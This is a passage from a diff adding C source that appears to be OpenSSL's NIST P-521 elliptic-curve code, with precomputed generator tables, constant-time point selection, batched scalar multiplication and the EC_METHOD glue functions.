+ * The reason for this is so that we can clock bits into four different
+ * locations when doing simple scalar multiplies against the base point.
+ *
+ * Tables for other points have table[i] = iG for i in 0 .. 16. */
+
+/* gmul is the table of precomputed base points */
+static const felem gmul[16][3] = { {{0, 0, 0, 0, 0, 0, 0, 0, 0},
+                                    {0, 0, 0, 0, 0, 0, 0, 0, 0},
+                                    {0, 0, 0, 0, 0, 0, 0, 0, 0}},
+{{0x017e7e31c2e5bd66, 0x022cf0615a90a6fe, 0x00127a2ffa8de334,
+  0x01dfbf9d64a3f877, 0x006b4d3dbaa14b5e, 0x014fed487e0a2bd8,
+  0x015b4429c6481390, 0x03a73678fb2d988e, 0x00c6858e06b70404},
+ {0x00be94769fd16650, 0x031c21a89cb09022, 0x039013fad0761353,
+  0x02657bd099031542, 0x03273e662c97ee72, 0x01e6d11a05ebef45,
+  0x03d1bd998f544495, 0x03001172297ed0b1, 0x011839296a789a3b},
+ {1, 0, 0, 0, 0, 0, 0, 0, 0}},
+{{0x0373faacbc875bae, 0x00f325023721c671, 0x00f666fd3dbde5ad,
+  0x01a6932363f88ea7, 0x01fc6d9e13f9c47b, 0x03bcbffc2bbf734e,
+  0x013ee3c3647f3a92, 0x029409fefe75d07d, 0x00ef9199963d85e5},
+ {0x011173743ad5b178, 0x02499c7c21bf7d46, 0x035beaeabb8b1a58,
+  0x00f989c4752ea0a3, 0x0101e1de48a9c1a3, 0x01a20076be28ba6c,
+  0x02f8052e5eb2de95, 0x01bfe8f82dea117c, 0x0160074d3c36ddb7},
+ {1, 0, 0, 0, 0, 0, 0, 0, 0}},
+{{0x012f3fc373393b3b, 0x03d3d6172f1419fa, 0x02adc943c0b86873,
+  0x00d475584177952b, 0x012a4d1673750ee2, 0x00512517a0f13b0c,
+  0x02b184671a7b1734, 0x0315b84236f1a50a, 0x00a4afc472edbdb9},
+ {0x00152a7077f385c4, 0x03044007d8d1c2ee, 0x0065829d61d52b52,
+  0x00494ff6b6631d0d, 0x00a11d94d5f06bcf, 0x02d2f89474d9282e,
+  0x0241c5727c06eeb9, 0x0386928710fbdb9d, 0x01f883f727b0dfbe},
+ {1, 0, 0, 0, 0, 0, 0, 0, 0}},
+{{0x019b0c3c9185544d, 0x006243a37c9d97db, 0x02ee3cbe030a2ad2,
+  0x00cfdd946bb51e0d, 0x0271c00932606b91, 0x03f817d1ec68c561,
+  0x03f37009806a369c, 0x03c1f30baf184fd5, 0x01091022d6d2f065},
+ {0x0292c583514c45ed, 0x0316fca51f9a286c, 0x00300af507c1489a,
+  0x0295f69008298cf1, 0x02c0ed8274943d7b, 0x016509b9b47a431e,
+  0x02bc9de9634868ce, 0x005b34929bffcb09, 0x000c1a0121681524},
+ {1, 0, 0, 0, 0, 0, 0, 0, 0}},
+{{0x0286abc0292fb9f2, 0x02665eee9805b3f7, 0x01ed7455f17f26d6,
+  0x0346355b83175d13, 0x006284944cd0a097, 0x0191895bcdec5e51,
+  0x02e288370afda7d9, 0x03b22312bfefa67a, 0x01d104d3fc0613fe},
+ {0x0092421a12f7e47f, 0x0077a83fa373c501, 0x03bd25c5f696bd0d,
+  0x035c41e4d5459761, 0x01ca0d1742b24f53, 0x00aaab27863a509c,
+  0x018b6de47df73917, 0x025c0b771705cd01, 0x01fd51d566d760a7},
+ {1, 0, 0, 0, 0, 0, 0, 0, 0}},
+{{0x01dd92ff6b0d1dbd, 0x039c5e2e8f8afa69, 0x0261ed13242c3b27,
+  0x0382c6e67026e6a0, 0x01d60b10be2089f9, 0x03c15f3dce86723f,
+  0x03c764a32d2a062d, 0x017307eac0fad056, 0x018207c0b96c5256},
+ {0x0196a16d60e13154, 0x03e6ce74c0267030, 0x00ddbf2b4e52a5aa,
+  0x012738241bbf31c8, 0x00ebe8dc04685a28, 0x024c2ad6d380d4a2,
+  0x035ee062a6e62d0e, 0x0029ed74af7d3a0f, 0x00eef32aec142ebd},
+ {1, 0, 0, 0, 0, 0, 0, 0, 0}},
+{{0x00c31ec398993b39, 0x03a9f45bcda68253, 0x00ac733c24c70890,
+  0x00872b111401ff01, 0x01d178c23195eafb, 0x03bca2c816b87f74,
+  0x0261a9af46fbad7a, 0x0324b2a8dd3d28f9, 0x00918121d8f24e23},
+ {0x032bc8c1ca983cd7, 0x00d869dfb08fc8c6, 0x01693cb61fce1516,
+  0x012a5ea68f4e88a8, 0x010869cab88d7ae3, 0x009081ad277ceee1,
+  0x033a77166d064cdc, 0x03955235a1fb3a95, 0x01251a4a9b25b65e},
+ {1, 0, 0, 0, 0, 0, 0, 0, 0}},
+{{0x00148a3a1b27f40b, 0x0123186df1b31fdc, 0x00026e7beaad34ce,
+  0x01db446ac1d3dbba, 0x0299c1a33437eaec, 0x024540610183cbb7,
+  0x0173bb0e9ce92e46, 0x02b937e43921214b, 0x01ab0436a9bf01b5},
+ {0x0383381640d46948, 0x008dacbf0e7f330f, 0x03602122bcc3f318,
+  0x01ee596b200620d6, 0x03bd0585fda430b3, 0x014aed77fd123a83,
+  0x005ace749e52f742, 0x0390fe041da2b842, 0x0189a8ceb3299242},
+ {1, 0, 0, 0, 0, 0, 0, 0, 0}},
+{{0x012a19d6b3282473, 0x00c0915918b423ce, 0x023a954eb94405ae,
+  0x00529f692be26158, 0x0289fa1b6fa4b2aa, 0x0198ae4ceea346ef,
+  0x0047d8cdfbdedd49, 0x00cc8c8953f0f6b8, 0x001424abbff49203},
+ {0x0256732a1115a03a, 0x0351bc38665c6733, 0x03f7b950fb4a6447,
+  0x000afffa94c22155, 0x025763d0a4dab540, 0x000511e92d4fc283,
+  0x030a7e9eda0ee96c, 0x004c3cd93a28bf0a, 0x017edb3a8719217f},
+ {1, 0, 0, 0, 0, 0, 0, 0, 0}},
+{{0x011de5675a88e673, 0x031d7d0f5e567fbe, 0x0016b2062c970ae5,
+  0x03f4a2be49d90aa7, 0x03cef0bd13822866, 0x03f0923dcf774a6c,
+  0x0284bebc4f322f72, 0x016ab2645302bb2c, 0x01793f95dace0e2a},
+ {0x010646e13527a28f, 0x01ca1babd59dc5e7, 0x01afedfd9a5595df,
+  0x01f15785212ea6b1, 0x0324e5d64f6ae3f4, 0x02d680f526d00645,
+  0x0127920fadf627a7, 0x03b383f75df4f684, 0x0089e0057e783b0a},
+ {1, 0, 0, 0, 0, 0, 0, 0, 0}},
+{{0x00f334b9eb3c26c6, 0x0298fdaa98568dce, 0x01c2d24843a82292,
+  0x020bcb24fa1b0711, 0x02cbdb3d2b1875e6, 0x0014907598f89422,
+  0x03abe3aa43b26664, 0x02cbf47f720bc168, 0x0133b5e73014b79b},
+ {0x034aab5dab05779d, 0x00cdc5d71fee9abb, 0x0399f16bd4bd9d30,
+  0x03582fa592d82647, 0x02be1cdfb775b0e9, 0x0034f7cea32e94cb,
+  0x0335a7f08f56f286, 0x03b707e9565d1c8b, 0x0015c946ea5b614f},
+ {1, 0, 0, 0, 0, 0, 0, 0, 0}},
+{{0x024676f6cff72255, 0x00d14625cac96378, 0x00532b6008bc3767,
+  0x01fc16721b985322, 0x023355ea1b091668, 0x029de7afdc0317c3,
+  0x02fc8a7ca2da037c, 0x02de1217d74a6f30, 0x013f7173175b73bf},
+ {0x0344913f441490b5, 0x0200f9e272b61eca, 0x0258a246b1dd55d2,
+  0x03753db9ea496f36, 0x025e02937a09c5ef, 0x030cbd3d14012692,
+  0x01793a67e70dc72a, 0x03ec1d37048a662e, 0x006550f700c32a8d},
+ {1, 0, 0, 0, 0, 0, 0, 0, 0}},
+{{0x00d3f48a347eba27, 0x008e636649b61bd8, 0x00d3b93716778fb3,
+  0x004d1915757bd209, 0x019d5311a3da44e0, 0x016d1afcbbe6aade,
+  0x0241bf5f73265616, 0x0384672e5d50d39b, 0x005009fee522b684},
+ {0x029b4fab064435fe, 0x018868ee095bbb07, 0x01ea3d6936cc92b8,
+  0x000608b00f78a2f3, 0x02db911073d1c20f, 0x018205938470100a,
+  0x01f1e4964cbe6ff2, 0x021a19a29eed4663, 0x01414485f42afa81},
+ {1, 0, 0, 0, 0, 0, 0, 0, 0}},
+{{0x01612b3a17f63e34, 0x03813992885428e6, 0x022b3c215b5a9608,
+  0x029b4057e19f2fcb, 0x0384059a587af7e6, 0x02d6400ace6fe610,
+  0x029354d896e8e331, 0x00c047ee6dfba65e, 0x0037720542e9d49d},
+ {0x02ce9eed7c5e9278, 0x0374ed703e79643b, 0x01316c54c4072006,
+  0x005aaa09054b2ee8, 0x002824000c840d57, 0x03d4eba24771ed86,
+  0x0189c50aabc3bdae, 0x0338c01541e15510, 0x00466d56e38eed42},
+ {1, 0, 0, 0, 0, 0, 0, 0, 0}},
+{{0x007efd8330ad8bd6, 0x02465ed48047710b, 0x0034c6606b215e0c,
+  0x016ae30c53cbf839, 0x01fa17bd37161216, 0x018ead4e61ce8ab9,
+  0x005482ed5f5dee46, 0x037543755bba1d7f, 0x005e5ac7e70a9d0f},
+ {0x0117e1bb2fdcb2a2, 0x03deea36249f40c4, 0x028d09b4a6246cb7,
+  0x03524b8855bcf756, 0x023d7d109d5ceb58, 0x0178e43e3223ef9c,
+  0x0154536a0c6e966a, 0x037964d1286ee9fe, 0x0199bcd90e125055},
+ {1, 0, 0, 0, 0, 0, 0, 0, 0}}
+};
+
+/*
+ * select_point selects the |idx|th point from a precomputation table and
+ * copies it to out.
+ */
+ /* pre_comp below is of the size provided in |size| */
+static void select_point(const limb idx, unsigned int size,
+                         const felem pre_comp[][3], felem out[3])
+{
+    unsigned i, j;
+    limb *outlimbs = &out[0][0];
+    memset(outlimbs, 0, 3 * sizeof(felem));
+
+    for (i = 0; i < size; i++) {
+        const limb *inlimbs = &pre_comp[i][0][0];
+        limb mask = i ^ idx;
+        mask |= mask >> 4;
+        mask |= mask >> 2;
+        mask |= mask >> 1;
+        mask &= 1;
+        mask--;
+        for (j = 0; j < NLIMBS * 3; j++)
+            outlimbs[j] |= inlimbs[j] & mask;
+    }
+}
+
+/* get_bit returns the |i|th bit in |in| */
+static char get_bit(const felem_bytearray in, int i)
+{
+    if (i < 0)
+        return 0;
+    return (in[i >> 3] >> (i & 7)) & 1;
+}
+
+/*
+ * Interleaved point multiplication using precomputed point multiples: The
+ * small point multiples 0*P, 1*P, ..., 16*P are in pre_comp[], the scalars
+ * in scalars[]. If g_scalar is non-NULL, we also add this multiple of the
+ * generator, using certain (large) precomputed multiples in g_pre_comp.
+ * Output point (X, Y, Z) is stored in x_out, y_out, z_out
+ */
+static void batch_mul(felem x_out, felem y_out, felem z_out,
+                      const felem_bytearray scalars[],
+                      const unsigned num_points, const u8 *g_scalar,
+                      const int mixed, const felem pre_comp[][17][3],
+                      const felem g_pre_comp[16][3])
+{
+    int i, skip;
+    unsigned num, gen_mul = (g_scalar != NULL);
+    felem nq[3], tmp[4];
+    limb bits;
+    u8 sign, digit;
+
+    /* set nq to the point at infinity */
+    memset(nq, 0, 3 * sizeof(felem));
+
+    /*
+     * Loop over all scalars msb-to-lsb, interleaving additions of multiples
+     * of the generator (last quarter of rounds) and additions of other
+     * points multiples (every 5th round).
+     */
+    skip = 1;                   /* save two point operations in the first
+                                 * round */
+    for (i = (num_points ? 520 : 130); i >= 0; --i) {
+        /* double */
+        if (!skip)
+            point_double(nq[0], nq[1], nq[2], nq[0], nq[1], nq[2]);
+
+        /* add multiples of the generator */
+        if (gen_mul && (i <= 130)) {
+            bits = get_bit(g_scalar, i + 390) << 3;
+            if (i < 130) {
+                bits |= get_bit(g_scalar, i + 260) << 2;
+                bits |= get_bit(g_scalar, i + 130) << 1;
+                bits |= get_bit(g_scalar, i);
+            }
+            /* select the point to add, in constant time */
+            select_point(bits, 16, g_pre_comp, tmp);
+            if (!skip) {
+                /* The 1 argument below is for "mixed" */
+                point_add(nq[0], nq[1], nq[2],
+                          nq[0], nq[1], nq[2], 1, tmp[0], tmp[1], tmp[2]);
+            } else {
+                memcpy(nq, tmp, 3 * sizeof(felem));
+                skip = 0;
+            }
+        }
+
+        /* do other additions every 5 doublings */
+        if (num_points && (i % 5 == 0)) {
+            /* loop over all scalars */
+            for (num = 0; num < num_points; ++num) {
+                bits = get_bit(scalars[num], i + 4) << 5;
+                bits |= get_bit(scalars[num], i + 3) << 4;
+                bits |= get_bit(scalars[num], i + 2) << 3;
+                bits |= get_bit(scalars[num], i + 1) << 2;
+                bits |= get_bit(scalars[num], i) << 1;
+                bits |= get_bit(scalars[num], i - 1);
+                ec_GFp_nistp_recode_scalar_bits(&sign, &digit, bits);
+
+                /*
+                 * select the point to add or subtract, in constant time
+                 */
+                select_point(digit, 17, pre_comp[num], tmp);
+                felem_neg(tmp[3], tmp[1]); /* (X, -Y, Z) is the negative
+                                            * point */
+                copy_conditional(tmp[1], tmp[3], (-(limb) sign));
+
+                if (!skip) {
+                    point_add(nq[0], nq[1], nq[2],
+                              nq[0], nq[1], nq[2],
+                              mixed, tmp[0], tmp[1], tmp[2]);
+                } else {
+                    memcpy(nq, tmp, 3 * sizeof(felem));
+                    skip = 0;
+                }
+            }
+        }
+    }
+    felem_assign(x_out, nq[0]);
+    felem_assign(y_out, nq[1]);
+    felem_assign(z_out, nq[2]);
+}
+
+/* Precomputation for the group generator. */
+typedef struct {
+    felem g_pre_comp[16][3];
+    int references;
+} NISTP521_PRE_COMP;
+
+const EC_METHOD *EC_GFp_nistp521_method(void)
+{
+    static const EC_METHOD ret = {
+        EC_FLAGS_DEFAULT_OCT,
+        NID_X9_62_prime_field,
+        ec_GFp_nistp521_group_init,
+        ec_GFp_simple_group_finish,
+        ec_GFp_simple_group_clear_finish,
+        ec_GFp_nist_group_copy,
+        ec_GFp_nistp521_group_set_curve,
+        ec_GFp_simple_group_get_curve,
+        ec_GFp_simple_group_get_degree,
+        ec_GFp_simple_group_check_discriminant,
+        ec_GFp_simple_point_init,
+        ec_GFp_simple_point_finish,
+        ec_GFp_simple_point_clear_finish,
+        ec_GFp_simple_point_copy,
+        ec_GFp_simple_point_set_to_infinity,
+        ec_GFp_simple_set_Jprojective_coordinates_GFp,
+        ec_GFp_simple_get_Jprojective_coordinates_GFp,
+        ec_GFp_simple_point_set_affine_coordinates,
+        ec_GFp_nistp521_point_get_affine_coordinates,
+        0 /* point_set_compressed_coordinates */ ,
+        0 /* point2oct */ ,
+        0 /* oct2point */ ,
+        ec_GFp_simple_add,
+        ec_GFp_simple_dbl,
+        ec_GFp_simple_invert,
+        ec_GFp_simple_is_at_infinity,
+        ec_GFp_simple_is_on_curve,
+        ec_GFp_simple_cmp,
+        ec_GFp_simple_make_affine,
+        ec_GFp_simple_points_make_affine,
+        ec_GFp_nistp521_points_mul,
+        ec_GFp_nistp521_precompute_mult,
+        ec_GFp_nistp521_have_precompute_mult,
+        ec_GFp_nist_field_mul,
+        ec_GFp_nist_field_sqr,
+        0 /* field_div */ ,
+        0 /* field_encode */ ,
+        0 /* field_decode */ ,
+        0                       /* field_set_to_one */
+    };
+
+    return &ret;
+}
+
+/******************************************************************************/
+/*
+ * FUNCTIONS TO MANAGE PRECOMPUTATION
+ */
+
+static NISTP521_PRE_COMP *nistp521_pre_comp_new()
+{
+    NISTP521_PRE_COMP *ret = NULL;
+    ret = (NISTP521_PRE_COMP *) OPENSSL_malloc(sizeof(NISTP521_PRE_COMP));
+    if (!ret) {
+        ECerr(EC_F_NISTP521_PRE_COMP_NEW, ERR_R_MALLOC_FAILURE);
+        return ret;
+    }
+    memset(ret->g_pre_comp, 0, sizeof(ret->g_pre_comp));
+    ret->references = 1;
+    return ret;
+}
+
+static void *nistp521_pre_comp_dup(void *src_)
+{
+    NISTP521_PRE_COMP *src = src_;
+
+    /* no need to actually copy, these objects never change! */
+    CRYPTO_add(&src->references, 1, CRYPTO_LOCK_EC_PRE_COMP);
+
+    return src_;
+}
+
+static void nistp521_pre_comp_free(void *pre_)
+{
+    int i;
+    NISTP521_PRE_COMP *pre = pre_;
+
+    if (!pre)
+        return;
+
+    i = CRYPTO_add(&pre->references, -1, CRYPTO_LOCK_EC_PRE_COMP);
+    if (i > 0)
+        return;
+
+    OPENSSL_free(pre);
+}
+
+static void nistp521_pre_comp_clear_free(void *pre_)
+{
+    int i;
+    NISTP521_PRE_COMP *pre = pre_;
+
+    if (!pre)
+        return;
+
+    i = CRYPTO_add(&pre->references, -1, CRYPTO_LOCK_EC_PRE_COMP);
+    if (i > 0)
+        return;
+
+    OPENSSL_cleanse(pre, sizeof(*pre));
+    OPENSSL_free(pre);
+}
+
+/******************************************************************************/
+/*
+ * OPENSSL EC_METHOD FUNCTIONS
+ */
+
+int ec_GFp_nistp521_group_init(EC_GROUP *group)
+{
+    int ret;
+    ret = ec_GFp_simple_group_init(group);
+    group->a_is_minus3 = 1;
+    return ret;
+}
+
+int ec_GFp_nistp521_group_set_curve(EC_GROUP *group, const BIGNUM *p,
+                                    const BIGNUM *a, const BIGNUM *b,
+                                    BN_CTX *ctx)
+{
+    int ret = 0;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *curve_p, *curve_a, *curve_b;
+
+    if (ctx == NULL)
+        if ((ctx = new_ctx = BN_CTX_new()) == NULL)
+            return 0;
+    BN_CTX_start(ctx);
+    if (((curve_p = BN_CTX_get(ctx)) == NULL) ||
+        ((curve_a = BN_CTX_get(ctx)) == NULL) ||
+        ((curve_b = BN_CTX_get(ctx)) == NULL))
+        goto err;
+    BN_bin2bn(nistp521_curve_params[0], sizeof(felem_bytearray), curve_p);
+    BN_bin2bn(nistp521_curve_params[1], sizeof(felem_bytearray), curve_a);
+    BN_bin2bn(nistp521_curve_params[2], sizeof(felem_bytearray), curve_b);
+    if ((BN_cmp(curve_p, p)) || (BN_cmp(curve_a, a)) || (BN_cmp(curve_b, b))) {
+        ECerr(EC_F_EC_GFP_NISTP521_GROUP_SET_CURVE,
+              EC_R_WRONG_CURVE_PARAMETERS);
+        goto err;
+    }
+    group->field_mod_func = BN_nist_mod_521;
+    ret = ec_GFp_simple_group_set_curve(group, p, a, b, ctx);
+ err:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+/*
+ * Takes the Jacobian coordinates (X, Y, Z) of a point and returns (X', Y') =
+ * (X/Z^2, Y/Z^3)
+ */
+int ec_GFp_nistp521_point_get_affine_coordinates(const EC_GROUP *group,
+                                                 const EC_POINT *point,
+                                                 BIGNUM *x, BIGNUM *y,
+                                                 BN_CTX *ctx)
+{
+    felem z1, z2, x_in, y_in, x_out, y_out;
+    largefelem tmp;
+
+    if (EC_POINT_is_at_infinity(group, point)) {
+        ECerr(EC_F_EC_GFP_NISTP521_POINT_GET_AFFINE_COORDINATES,
+              EC_R_POINT_AT_INFINITY);
+        return 0;
+    }
+    if ((!BN_to_felem(x_in, &point->X)) || (!BN_to_felem(y_in, &point->Y)) ||
+        (!BN_to_felem(z1, &point->Z)))
+        return 0;
+    felem_inv(z2, z1);
+    felem_square(tmp, z2);
+    felem_reduce(z1, tmp);
+    felem_mul(tmp, x_in, z1);
+    felem_reduce(x_in, tmp);
+    felem_contract(x_out, x_in);
+    if (x != NULL) {
+        if (!felem_to_BN(x, x_out)) {
+            ECerr(EC_F_EC_GFP_NISTP521_POINT_GET_AFFINE_COORDINATES,
+                  ERR_R_BN_LIB);
+            return 0;
+        }
+    }
+    felem_mul(tmp, z1, z2);
+    felem_reduce(z1, tmp);
+    felem_mul(tmp, y_in, z1);
+    felem_reduce(y_in, tmp);
+    felem_contract(y_out, y_in);
+    if (y != NULL) {
+        if (!felem_to_BN(y, y_out)) {
+            ECerr(EC_F_EC_GFP_NISTP521_POINT_GET_AFFINE_COORDINATES,
+                  ERR_R_BN_LIB);
+            return 0;
+        }
+    }
+    return 1;
+}
+
+/* points below is of size |num|, and tmp_felems is of size |num+1/ */
+static void make_points_affine(size_t num, felem points[][3],
+                               felem tmp_felems[])
+{
+    /*
+     * Runs in constant time, unless an input is the point at infinity (which
+     * normally shouldn't happen).
+     */
+    ec_GFp_nistp_points_make_affine_internal(num,
+                                             points,
+                                             sizeof(felem),
+                                             tmp_felems,
+                                             (void (*)(void *))felem_one,
+                                             (int (*)(const void *))
+                                             felem_is_zero_int,
+                                             (void (*)(void *, const void *))
+                                             felem_assign,
+                                             (void (*)(void *, const void *))
+                                             felem_square_reduce, (void (*)
+                                                                   (void *,
+                                                                    const void
+                                                                    *,
+                                                                    const void
+                                                                    *))
+                                             felem_mul_reduce,
+                                             (void (*)(void *, const void *))
+                                             felem_inv,
+                                             (void (*)(void *, const void *))
+                                             felem_contract);
+}
+
+/*
+ * Computes scalar*generator + \sum scalars[i]*points[i], ignoring NULL
+ * values Result is stored in r (r can equal one of the inputs).
+ */
+int ec_GFp_nistp521_points_mul(const EC_GROUP *group, EC_POINT *r,
+                               const BIGNUM *scalar, size_t num,
+                               const EC_POINT *points[],
+                               const BIGNUM *scalars[], BN_CTX *ctx)
+{
+    int ret = 0;
+    int j;
+    int mixed = 0;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *x, *y, *z, *tmp_scalar;
+    felem_bytearray g_secret;
+    felem_bytearray *secrets = NULL;
+    felem(*pre_comp)[17][3] = NULL;
+    felem *tmp_felems = NULL;
+    felem_bytearray tmp;
+    unsigned i, num_bytes;
+    int have_pre_comp = 0;
+    size_t num_points = num;
+    felem x_in, y_in, z_in, x_out, y_out, z_out;
+    NISTP521_PRE_COMP *pre = NULL;
+    felem(*g_pre_comp)[3] = NULL;
+    EC_POINT *generator = NULL;
+    const EC_POINT *p = NULL;
+    const BIGNUM *p_scalar = NULL;
+
+    if (ctx == NULL)
+        if ((ctx = new_ctx = BN_CTX_new()) == NULL)
+            return 0;
+    BN_CTX_start(ctx);
+    if (((x = BN_CTX_get(ctx)) == NULL) ||
+        ((y = BN_CTX_get(ctx)) == NULL) ||
+        ((z = BN_CTX_get(ctx)) == NULL) ||
+        ((tmp_scalar = BN_CTX_get(ctx)) == NULL))
+        goto err;
+
+    if (scalar != NULL) {
+        pre = EC_EX_DATA_get_data(group->extra_data,
+                                  nistp521_pre_comp_dup,
+                                  nistp521_pre_comp_free,
+                                  nistp521_pre_comp_clear_free);
+        if (pre)
+            /* we have precomputation, try to use it */
+            g_pre_comp = &pre->g_pre_comp[0];
+        else
+            /* try to use the standard precomputation */
+            g_pre_comp = (felem(*)[3]) gmul;
+        generator = EC_POINT_new(group);
+        if (generator == NULL)
+            goto err;
+        /* get the generator from precomputation */
+        if (!felem_to_BN(x, g_pre_comp[1][0]) ||
+            !felem_to_BN(y, g_pre_comp[1][1]) ||
+            !felem_to_BN(z, g_pre_comp[1][2])) {
+            ECerr(EC_F_EC_GFP_NISTP521_POINTS_MUL, ERR_R_BN_LIB);
+            goto err;
+        }
+        if (!EC_POINT_set_Jprojective_coordinates_GFp(group,
+                                                      generator, x, y, z,
+                                                      ctx))
+            goto err;
+        if (0 == EC_POINT_cmp(group, generator, group->generator, ctx))
+            /* precomputation matches generator */
+            have_pre_comp = 1;
+        else
+            /*
+             * we don't have valid precomputation: treat the generator as a
+             * random point
+             */
+            num_points++;
+    }
+
+    if (num_points > 0) {
+        if (num_points >= 2) {
+            /*
+             * unless we precompute multiples for just one point, converting
+             * those into affine form is time well spent
+             */
+            mixed = 1;
+        }
+        secrets = OPENSSL_malloc(num_points * sizeof(felem_bytearray));
+        pre_comp = OPENSSL_malloc(num_points * 17 * 3 * sizeof(felem));
+        if (mixed)
+            tmp_felems =
+                OPENSSL_malloc((num_points * 17 + 1) * sizeof(felem));
+        if ((secrets == NULL) || (pre_comp == NULL)
+            || (mixed && (tmp_felems == NULL))) {
+            ECerr(EC_F_EC_GFP_NISTP521_POINTS_MUL, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        /*
+         * we treat NULL scalars as 0, and NULL points as points at infinity,
+         * i.e., they contribute nothing to the linear combination
+         */
+        memset(secrets, 0, num_points * sizeof(felem_bytearray));
+        memset(pre_comp, 0, num_points * 17 * 3 * sizeof(felem));
+        for (i = 0; i < num_points; ++i) {
+            if (i == num)
+                /*
+                 * we didn't have a valid precomputation, so we pick the
+                 * generator
+                 */
+            {
+                p = EC_GROUP_get0_generator(group);
+                p_scalar = scalar;
+            } else
+                /* the i^th point */
+            {
+                p = points[i];
+                p_scalar = scalars[i];
+            }
+            if ((p_scalar != NULL) && (p != NULL)) {
+                /* reduce scalar to 0 <= scalar < 2^521 */
+                if ((BN_num_bits(p_scalar) > 521)
+                    || (BN_is_negative(p_scalar))) {
+                    /*
+                     * this is an unusual input, and we don't guarantee
+                     * constant-timeness
+                     */
+                    if (!BN_nnmod(tmp_scalar, p_scalar, &group->order, ctx)) {
+                        ECerr(EC_F_EC_GFP_NISTP521_POINTS_MUL, ERR_R_BN_LIB);
+                        goto err;
+                    }
+                    num_bytes = BN_bn2bin(tmp_scalar, tmp);
+                } else
+                    num_bytes = BN_bn2bin(p_scalar, tmp);
+                flip_endian(secrets[i], tmp, num_bytes);
+                /* precompute multiples */
+                if ((!BN_to_felem(x_out, &p->X)) ||
+                    (!BN_to_felem(y_out, &p->Y)) ||
+                    (!BN_to_felem(z_out, &p->Z)))
+                    goto err;
+                memcpy(pre_comp[i][1][0], x_out, sizeof(felem));
+                memcpy(pre_comp[i][1][1], y_out, sizeof(felem));
+                memcpy(pre_comp[i][1][2], z_out, sizeof(felem));
+                for (j = 2; j <= 16; ++j) {
+                    if (j & 1) {
+                        point_add(pre_comp[i][j][0], pre_comp[i][j][1],
+                                  pre_comp[i][j][2], pre_comp[i][1][0],
+                                  pre_comp[i][1][1], pre_comp[i][1][2], 0,
+                                  pre_comp[i][j - 1][0],
+                                  pre_comp[i][j - 1][1],
+                                  pre_comp[i][j - 1][2]);
+                    } else {
+                        point_double(pre_comp[i][j][0], pre_comp[i][j][1],
+                                     pre_comp[i][j][2], pre_comp[i][j / 2][0],
+                                     pre_comp[i][j / 2][1],
+                                     pre_comp[i][j / 2][2]);
+                    }
+                }
+            }
+        }
+        if (mixed)
+            make_points_affine(num_points * 17, pre_comp[0], tmp_felems);
+    }
+
+    /* the scalar for the generator */
+    if ((scalar != NULL) && (have_pre_comp)) {
+        memset(g_secret, 0, sizeof(g_secret));
+        /* reduce scalar to 0 <= scalar < 2^521 */
+        if ((BN_num_bits(scalar) > 521) || (BN_is_negative(scalar))) {
+            /*
+             * this is an unusual input, and we don't guarantee
+             * constant-timeness
+             */
+            if (!BN_nnmod(tmp_scalar, scalar, &group->order, ctx)) {
+                ECerr(EC_F_EC_GFP_NISTP521_POINTS_MUL, ERR_R_BN_LIB);
+                goto err;
+            }
+            num_bytes = BN_bn2bin(tmp_scalar, tmp);
+        } else
+            num_bytes = BN_bn2bin(scalar, tmp);
+        flip_endian(g_secret, tmp, num_bytes);
+        /* do the multiplication with generator precomputation */
+        batch_mul(x_out, y_out, z_out,
+                  (const felem_bytearray(*))secrets, num_points,
+                  g_secret,
+                  mixed, (const felem(*)[17][3])pre_comp,
+                  (const felem(*)[3])g_pre_comp);
+    } else
+        /* do the multiplication without generator precomputation */
+        batch_mul(x_out, y_out, z_out,
+                  (const felem_bytearray(*))secrets, num_points,
+                  NULL, mixed, (const felem(*)[17][3])pre_comp, NULL);
+    /* reduce the output to its unique minimal representation */
+    felem_contract(x_in, x_out);
+    felem_contract(y_in, y_out);
+    felem_contract(z_in, z_out);
+    if ((!felem_to_BN(x, x_in)) || (!felem_to_BN(y, y_in)) ||
+        (!felem_to_BN(z, z_in))) {
+        ECerr(EC_F_EC_GFP_NISTP521_POINTS_MUL, ERR_R_BN_LIB);
+        goto err;
+    }
+    ret = EC_POINT_set_Jprojective_coordinates_GFp(group, r, x, y, z, ctx);
+
+ err:
+    BN_CTX_end(ctx);
+    if (generator != NULL)
+        EC_POINT_free(generator);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    if (secrets != NULL)
+        OPENSSL_free(secrets);
+    if (pre_comp != NULL)
+        OPENSSL_free(pre_comp);
+    if (tmp_felems != NULL)
+        OPENSSL_free(tmp_felems);
+    return ret;
+}
+
+int ec_GFp_nistp521_precompute_mult(EC_GROUP *group, BN_CTX *ctx)
+{
+    int ret = 0;
+    NISTP521_PRE_COMP *pre = NULL;
+    int i, j;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *x, *y;
+    EC_POINT *generator = NULL;
+    felem tmp_felems[16];
+
+    /* throw away old precomputation */
+    EC_EX_DATA_free_data(&group->extra_data, nistp521_pre_comp_dup,
+                         nistp521_pre_comp_free,
+                         nistp521_pre_comp_clear_free);
+    if (ctx == NULL)
+        if ((ctx = new_ctx = BN_CTX_new()) == NULL)
+            return 0;
+    BN_CTX_start(ctx);
+    if (((x = BN_CTX_get(ctx)) == NULL) || ((y = BN_CTX_get(ctx)) == NULL))
+        goto err;
+    /* get the generator */
+    if (group->generator == NULL)
+        goto err;
+    generator = EC_POINT_new(group);
+    if (generator == NULL)
+        goto err;
+    BN_bin2bn(nistp521_curve_params[3], sizeof(felem_bytearray), x);
+    BN_bin2bn(nistp521_curve_params[4], sizeof(felem_bytearray), y);
+    if (!EC_POINT_set_affine_coordinates_GFp(group, generator, x, y, ctx))
+        goto err;
+    if ((pre = nistp521_pre_comp_new()) == NULL)
+        goto err;
+    /*
+     * if the generator is the standard one, use built-in precomputation
+     */
+    if (0 == EC_POINT_cmp(group, generator, group->generator, ctx)) {
+        memcpy(pre->g_pre_comp, gmul, sizeof(pre->g_pre_comp));
+        ret = 1;
+        goto err;
+    }
+    if ((!BN_to_felem(pre->g_pre_comp[1][0], &group->generator->X)) ||
+        (!BN_to_felem(pre->g_pre_comp[1][1], &group->generator->Y)) ||
+        (!BN_to_felem(pre->g_pre_comp[1][2], &group->generator->Z)))
+        goto err;
+    /* compute 2^130*G, 2^260*G, 2^390*G */
